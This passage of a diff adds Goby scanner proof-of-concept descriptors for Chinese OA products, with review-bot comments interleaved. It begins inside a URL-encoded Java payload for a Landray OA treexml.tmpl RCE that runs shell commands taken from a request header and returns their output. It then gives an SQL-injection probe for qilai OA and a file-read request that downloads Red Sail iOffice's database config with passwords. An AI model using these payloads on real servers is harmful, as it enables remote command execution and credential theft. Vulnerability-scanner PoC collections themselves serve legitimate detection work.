"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+n
ew+String[]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "Tags": [
+ "代码执⾏"
+ ],
+ "VulType": [
+ "代码执⾏"
+ ],
+ "CVEIDs": [
+ ""
+ ],
+ "CNNVD": [
+ ""
+ ],
+ "CNVD": [
+ ""
+ ],
+ "CVSSScore": "",
+ "Translation": {
+ "CN": {
+ "Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞",
+ "Product": "蓝凌OA",
+ "Description": "蓝凌OA treexml.tmpl存在远程代码执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限
",
+ "Recommendation": "",
+ "Impact": "",
+ "VulType": [
+ "代码执⾏"
+ ],
+ "Tags": [
+ "代码执⾏"
+ ]
+ },
+ "EN": {
+ "Name": "landray-oa-treexml-rce",
+ "Product": "",
+ "Description": "",
+ "Recommendation": "",
+ "Impact": "",
+ "VulType": [],
+ "Tags": []
+ }
+ },
+ "AttackSurfaces": {
+ "Application": null,
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ }
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ nil,
+ nil,
+ ))
+}
\ No newline at end of file
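Review bot: `Tags`, `VulType` and both arrays under `Translation.CN` spell the category as `代码执⾏` using the Kangxi-radical code point U+2F8F (`⾏`) instead of the ordinary CJK ideograph U+884C (`行`) that the `Name` in the same descriptor uses (`远程代码执行漏洞`); the two glyphs look identical but compare unequal, so any tag filter for `代码执行` will miss this PoC — replace the radical in all four places. The `Description` values (top level and `Translation.CN`) appear to contain a raw line break before the closing quote, which is not valid JSON if it is really in the file rather than a rendering artifact, and `CVEIDs`, `CNNVD` and `CNVD` are `[""]` — an array holding an empty string — where `null` (as the iAudit descriptor in this patch uses) or `[]` is the convention. `Author` and the whole `Translation.EN` block are empty. Both callback arguments to `NewExploit` are `nil`, so this `.go` wrapper adds nothing over the plain `.json` form used by the other files in the patch; either implement the callbacks or ship it as JSON alongside them. The scan step executes `echo This page has a bug` through the `cmd` header, i.e. the "scan" is active command execution on the target, which the empty `Impact` should state.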
diff --git a/goby_pocs/qilaiOA_messageurl.aspx_SQLinjection.json b/goby_pocs/qilaiOA_messageurl.aspx_SQLinjection.json
new file mode 100644
index 0000000..3358613
--- /dev/null
+++ b/goby_pocs/qilaiOA_messageurl.aspx_SQLinjection.json
@@ -0,0 +1,99 @@
+{
+ "Name": "qilaiOA messageurl.aspx SQLinjection",
+ "Level": "3",
+ "Tags": [
+ "sqli"
+ ],
+ "GobyQuery": "header=\"Server\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/client/messageurl.aspx?user='",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "messageurl",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-11 22:46:07",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
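Review bot: `GobyQuery` is `header="Server"`, which matches practically every HTTP host rather than the qilai OA product, so the scanner will send this SQL-injection probe (`/client/messageurl.aspx?user='`) to every asset it sees — noisy, easily out of scope, and prone to false positives since the `ResponseTest` only needs a 500 whose body mentions `messageurl`. The fingerprint should be product-specific (a title, body or path marker for qilai OA), as the other descriptors in this patch do; qilaiOA_treelist.aspx_SQLinjection.json uses the same `header="Server"` query and has the same problem.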
diff --git a/goby_pocs/qilaiOA_treelist.aspx_SQLinjection.json b/goby_pocs/qilaiOA_treelist.aspx_SQLinjection.json
new file mode 100644
index 0000000..79c698f
--- /dev/null
+++ b/goby_pocs/qilaiOA_treelist.aspx_SQLinjection.json
@@ -0,0 +1,102 @@
+{
+ "Name": "qilaiOA treelist.aspx SQLinjection",
+ "Level": "3",
+ "Tags": [
+ "sqli"
+ ],
+ "GobyQuery": "header=\"Server\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/client/treelist.aspx?user='",
+ "follow_redirect": true,
+ "header": {
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+ "Accept-Encoding": "gzip, deflate"
+ },
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "treelist",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-11 22:36:19",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
diff --git a/goby_pocs/red_fan_OA_hospital_ioFileExport.aspx_file_read.json b/goby_pocs/red_fan_OA_hospital_ioFileExport.aspx_file_read.json
new file mode 100644
index 0000000..0f22b64
--- /dev/null
+++ b/goby_pocs/red_fan_OA_hospital_ioFileExport.aspx_file_read.json
@@ -0,0 +1,99 @@
+{
+ "Name": "Red sail-ioffice OA hospital ioFileExport.aspx file read",
+ "Level": "3",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "app=\"Red sail-ioffice\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/iODbSet.config&filename=iODbSet.config&ContentType=application/octet-stream",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "pwd",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-15 22:45:45",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
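Review bot: The scan step downloads `iODbSet.config` and the `SetVariable` line `output|lastbody|regex|` captures the entire response body into the scan output, so a positive hit stores the target's database configuration (the check itself looks for `pwd`) in the scanner's results; that handling of captured credentials should be stated in `Impact`/`Description` (both empty), and the regex slot of `SetVariable` should narrow the stored output to a non-secret marker instead of the whole file. The `Name` ("Red sail-ioffice") and the filename (`red_fan_OA`) use two different romanisations of the same product and should be unified so the PoC can be found by either.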